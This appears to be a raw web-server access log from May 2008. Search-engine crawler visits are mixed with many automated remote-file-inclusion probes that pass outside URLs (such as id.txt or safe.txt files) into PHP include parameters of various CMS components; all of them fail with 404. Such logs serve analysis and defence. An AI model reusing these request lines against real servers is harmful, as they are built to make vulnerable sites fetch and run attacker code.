74.6.9.160 - - [07/May/2008:06:37:32 -0500] "GET /logs/access_log.1162252800 HTTP/1.0" 200 358277 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.90.83 - - [07/May/2008:06:41:07 -0500] "GET /logs/error.php=dirhttp://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
72.29.90.83 - - [07/May/2008:06:41:07 -0500] "GET /error.php=dirhttp://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
80.237.209.104 - - [07/May/2008:06:43:31 -0500] "GET /logs/access_log.1207785600//include.php?path[docroot]=http://www.hotellasamericas.com.co//cache/allyes.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
80.237.209.104 - - [07/May/2008:06:43:32 -0500] "GET //include.php?path[docroot]=http://www.hotellasamericas.com.co//cache/allyes.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
80.237.209.104 - - [07/May/2008:06:43:32 -0500] "GET /logs//include.php?path[docroot]=http://www.hotellasamericas.com.co//cache/allyes.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
66.225.192.249 - - [07/May/2008:06:43:39 -0500] "GET /logs/external/frontend/news.php?cfg[path][includes]=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:06:43:39 -0500] "GET /external/frontend/news.php?cfg[path][includes]=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
65.55.208.125 - - [07/May/2008:06:54:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [07/May/2008:06:54:51 -0500] "GET /logs/access_log.1194739200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.28.173 - - [07/May/2008:07:02:53 -0500] "GET /artwork/sculptures.htm HTTP/1.0" 200 3706 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.17.17.82 - - [07/May/2008:07:07:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.17.17.82 - - [07/May/2008:07:07:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
74.6.23.159 - - [07/May/2008:07:09:35 -0500] "GET /logs/access_log.1167350400 HTTP/1.0" 200 185410 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.19.96 - - [07/May/2008:07:19:22 -0500] "GET /logs/access_log.1173052800 HTTP/1.0" 200 203101 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.9.48 - - [07/May/2008:07:28:35 -0500] "GET /logs/access_log.1201737600 HTTP/1.0" 200 230360 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.3.183 - - [07/May/2008:07:33:39 -0500] "GET /logs//jan-url1.txt/modules/xoopsgallery/init_basic.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:07:33:39 -0500] "GET //jan-url1.txt/modules/xoopsgallery/init_basic.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:07:33:46 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:07:33:47 -0500] "GET //skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:07:33:48 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:07:34:14 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
66.225.192.249 - - [07/May/2008:07:36:45 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:07:36:45 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:07:36:46 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
89.111.176.28 - - [07/May/2008:07:42:13 -0500] "GET /logs//jan-url1.txt/modules/xoopsgallery/init_basic.php=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
89.111.176.28 - - [07/May/2008:07:42:14 -0500] "GET //jan-url1.txt/modules/xoopsgallery/init_basic.php=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 373 "-""libwww-perl/5.805"
89.255.60.225 - - [07/May/2008:07:52:01 -0500] "GET /logs/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:07:52:01 -0500] "GET /send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:07:56:09 -0500] "GET /logs/access_log.1204761600/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:07:56:09 -0500] "GET /send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:07:56:09 -0500] "GET /logs/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
207.58.138.166 - - [07/May/2008:08:05:05 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
207.58.138.166 - - [07/May/2008:08:05:05 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
207.58.138.166 - - [07/May/2008:08:06:16 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:06:19 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:08:31 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:08:31 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
189.11.126.17 - - [07/May/2008:08:11:08 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
189.11.126.17 - - [07/May/2008:08:11:09 -0500] "GET //skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
189.11.126.17 - - [07/May/2008:08:11:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
189.11.126.17 - - [07/May/2008:08:11:21 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
202.153.128.112 - - [07/May/2008:08:13:21 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
202.153.128.112 - - [07/May/2008:08:13:22 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
74.6.28.40 - - [07/May/2008:08:15:22 -0500] "GET /logs/access_log.1181433600 HTTP/1.0" 200 238186 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.7.199.73 - - [07/May/2008:08:16:01 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://warcrew.by.ru/s.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
66.7.199.73 - - [07/May/2008:08:16:01 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://warcrew.by.ru/s.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
66.225.246.28 - - [07/May/2008:08:18:58 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
66.225.246.28 - - [07/May/2008:08:18:58 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
216.32.85.218 - - [07/May/2008:08:19:10 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dokoiku.jp/master/zip_code/tools/pro/temp.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
216.32.85.218 - - [07/May/2008:08:19:10 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dokoiku.jp/master/zip_code/tools/pro/temp.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
213.208.165.244 - - [07/May/2008:08:19:38 -0500] "GET /200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
74.6.7.230 - - [07/May/2008:08:19:41 -0500] "GET /logs/access_log.1169856000 HTTP/1.0" 200 173856 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.208.165.244 - - [07/May/2008:08:20:44 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20mygallery/myfunctions/mygallerybrowser.php?myPath=http:/xdengue01.%20...%2040:25%20-0500]%20%22GET%20/logs/admin.php?include_path=http:/www.benew.nl/vragenlijst%20...%3C/div%3E%20%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20%20-%20%3Cem%3E209k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAcMNXNyoA;_ylu=X3oDMTB0MWlvN3RkBHNlYwNzcgRwb3MDNDczBGNvbG8DYWMyBHZ0aWQD/SIG=12odc7lhn/EXP=1210251969/**http%3a/www.thaiguru.de/lofi/index.php%3fid=25540%26q=hausnebenkosten%22%20%20lang=%22de%22%3ESuche%20~%20ThaiGuru%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.thaiguru.de%2Flofi%2Findex.php%3Fid%3D25540%26q%3Dhausnebenkosten&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%20modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:/www.%20...%20admin/editor2/spaw_control.class.php?spaw_root=http:/www.(0)%20%7C%20thai%20gay%20boys%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.thaiguru.de/lofi/%3Cwbr%20/%3Eindex.php?id=25540&q=hausnebenkosten%3C/span%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAccNXNyoA;_ylu=X3oDMTB0dnBwOXU1BHNlYwNzcgRwb3MDNDc0BGNvbG8DYWMyBHZ0aWQD/SIG=133fpnsi7/EXP=1210251969/**http%3a/www.nctc.jp/cgi-bin/awstats.pl%3fyear=2007%26month=11%26output=errors404%22%20%20lang=%22ja%22%3E%20www.nctc.jp%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22ja%22%3Emodules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:%20...%20bin/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:/72.1.85.234%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.nctc.jp/cgi-bin/%3Cwbr%20/%3Eawstats.pl?year=2007&month=11&output=errors404%3C/span%3E%20%20-%20%3Cem%3E180k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAcsNXNyoA;_ylu=X3oDMTB0NzRnZjlsBHNlYwNzcgRwb3MDNDc1BGNvbG8DYWMyBHZ0aWQD/SIG=14iklvd6q/EXP=1210251969/**http%3a/www.www.or.at/online.php/administrator/components/com_joom12pic/citywriter/index.php/appserv/includes/view.php%3fcid=49%22%20%20lang=%22de%22%3ELINK.at%20/%20Sport%20&%20Unterhaltung%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.www.or.at%2Fonline.php%2Fadministrator%2Fcomponents%2Fcom_joom12pic%2Fcitywriter%2Findex.php%2Fappserv%2Fincludes%2Fview.php%3Fcid%3D49&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3EPhp-X-Links%20is%20a%20links%20storage%20system%20to%20keep%20all%20your%20favorite%20links%20in%20one%20...%20admin/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=ftp:%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.or.at/online.php/administrator/%3Cwbr%20/%3Ecomponents/com_joom12pic/...?cid=49%3C/span%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAc8NXNyoA;_ylu=X3oDMTB0MmFycHU1BHNlYwNzcgRwb3MDNDc2BGNvbG8DYWMyBHZ0aWQD/SIG=11t73lnj7/EXP=1210251969/**http%3a/www.nk.ca/visitors/14July2007.html/200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
213.208.165.244 - - [07/May/2008:08:20:45 -0500] "GET /200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
213.208.165.244 - - [07/May/2008:08:20:45 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20mygallery/myfunctions/mygallerybrowser.php?myPath=http:/xdengue01.%20...%2040:25%20-0500]%20%22GET%20/logs/admin.php?include_path=http:/www.benew.nl/vragenlijst%20...%3C/div%3E%20%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20%20-%20%3Cem%3E209k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAcMNXNyoA;_ylu=X3oDMTB0MWlvN3RkBHNlYwNzcgRwb3MDNDczBGNvbG8DYWMyBHZ0aWQD/SIG=12odc7lhn/EXP=1210251969/**http%3a/www.thaiguru.de/lofi/index.php%3fid=25540%26q=hausnebenkosten%22%20%20lang=%22de%22%3ESuche%20~%20ThaiGuru%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.thaiguru.de%2Flofi%2Findex.php%3Fid%3D25540%26q%3Dhausnebenkosten&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%20modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:/www.%20...%20admin/editor2/spaw_control.class.php?spaw_root=http:/www.(0)%20%7C%20thai%20gay%20boys%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.thaiguru.de/lofi/%3Cwbr%20/%3Eindex.php?id=25540&q=hausnebenkosten%3C/span%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAccNXNyoA;_ylu=X3oDMTB0dnBwOXU1BHNlYwNzcgRwb3MDNDc0BGNvbG8DYWMyBHZ0aWQD/SIG=133fpnsi7/EXP=1210251969/**http%3a/www.nctc.jp/cgi-bin/awstats.pl%3fyear=2007%26month=11%26output=errors404%22%20%20lang=%22ja%22%3E%20www.nctc.jp%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22ja%22%3Emodules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:%20...%20bin/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http:/72.1.85.234%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.nctc.jp/cgi-bin/%3Cwbr%20/%3Eawstats.pl?year=2007&month=11&output=errors404%3C/span%3E%20%20-%20%3Cem%3E180k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAcsNXNyoA;_ylu=X3oDMTB0NzRnZjlsBHNlYwNzcgRwb3MDNDc1BGNvbG8DYWMyBHZ0aWQD/SIG=14iklvd6q/EXP=1210251969/**http%3a/www.www.or.at/online.php/administrator/components/com_joom12pic/citywriter/index.php/appserv/includes/view.php%3fcid=49%22%20%20lang=%22de%22%3ELINK.at%20/%20Sport%20&%20Unterhaltung%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.www.or.at%2Fonline.php%2Fadministrator%2Fcomponents%2Fcom_joom12pic%2Fcitywriter%2Findex.php%2Fappserv%2Fincludes%2Fview.php%3Fcid%3D49&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3EPhp-X-Links%20is%20a%20links%20storage%20system%20to%20keep%20all%20your%20favorite%20links%20in%20one%20...%20admin/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=ftp:%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.or.at/online.php/administrator/%3Cwbr%20/%3Ecomponents/com_joom12pic/...?cid=49%3C/span%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7NBqSFIUQUAc8NXNyoA;_ylu=X3oDMTB0MmFycHU1BHNlYwNzcgRwb3MDNDc2BGNvbG8DYWMyBHZ0aWQD/SIG=11t73lnj7/EXP=1210251969/**http%3a/www.nk.ca/visitors/200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
202.153.128.112 - - [07/May/2008:08:21:06 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:08:21:32 -0500] "GET /logs//xajax_functions.php?mosConfig_absolute_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:08:21:32 -0500] "GET //xajax_functions.php?mosConfig_absolute_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
65.55.208.124 - - [07/May/2008:08:21:36 -0500] "GET /logs/access_log.1208044800 HTTP/1.1" 200 122312 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.25.145.85 - - [07/May/2008:08:26:38 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
85.25.145.85 - - [07/May/2008:08:26:41 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.230.21.32 - - [07/May/2008:08:29:30 -0500] "GET /logs//oneadmin/common/include.php?path[docroot]http://h1.ripway.com/aaahckr/my-id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
87.230.21.32 - - [07/May/2008:08:29:30 -0500] "GET //oneadmin/common/include.php?path[docroot]http://h1.ripway.com/aaahckr/my-id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
207.195.169.18 - - [07/May/2008:08:30:27 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
207.195.169.18 - - [07/May/2008:08:30:39 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
69.90.72.88 - - [07/May/2008:08:33:23 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://cocreation.hk/id? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.90.72.88 - - [07/May/2008:08:33:23 -0500] "GET //Neos_Chronos/header.php?base_folder=http://cocreation.hk/id? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
212.241.179.137 - - [07/May/2008:08:35:20 -0500] "GET /logs//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://www.utviklingsstudier.org/cache/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.137 - - [07/May/2008:08:35:20 -0500] "GET //index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://www.utviklingsstudier.org/cache/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.26.1.33 - - [07/May/2008:08:35:36 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
74.6.27.111 - - [07/May/2008:08:35:47 -0500] "GET /logs/access_log.1201651200 HTTP/1.0" 200 308239 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.11.108.130 - - [07/May/2008:08:35:52 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
142.150.1.9 - - [07/May/2008:08:36:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
85.25.145.85 - - [07/May/2008:08:39:16 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.i-promo.info/test.txt? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
207.58.138.166 - - [07/May/2008:08:39:47 -0500] "GET /logs/access_log.1207785600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
207.58.138.166 - - [07/May/2008:08:39:47 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
207.58.138.166 - - [07/May/2008:08:39:47 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
207.58.138.166 - - [07/May/2008:08:39:48 -0500] "GET /logs/access_log.1207180800/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
64.27.19.194 - - [07/May/2008:08:40:37 -0500] "GET /logs/access_log.1204761600/convert/mvcw.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
64.27.19.194 - - [07/May/2008:08:40:38 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
64.27.19.194 - - [07/May/2008:08:40:38 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
83.190.16.153 - - [07/May/2008:08:40:57 -0500] "GET /logs/oneadmin/oneadmin/common/include.php?path[docroot]=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
83.190.16.153 - - [07/May/2008:08:40:57 -0500] "GET /oneadmin/oneadmin/common/include.php?path[docroot]=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.121.64.29 - - [07/May/2008:08:41:41 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.121.64.29 - - [07/May/2008:08:41:42 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.64.29 - - [07/May/2008:08:41:45 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
91.121.64.29 - - [07/May/2008:08:41:45 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
62.128.1.35 - - [07/May/2008:08:46:37 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
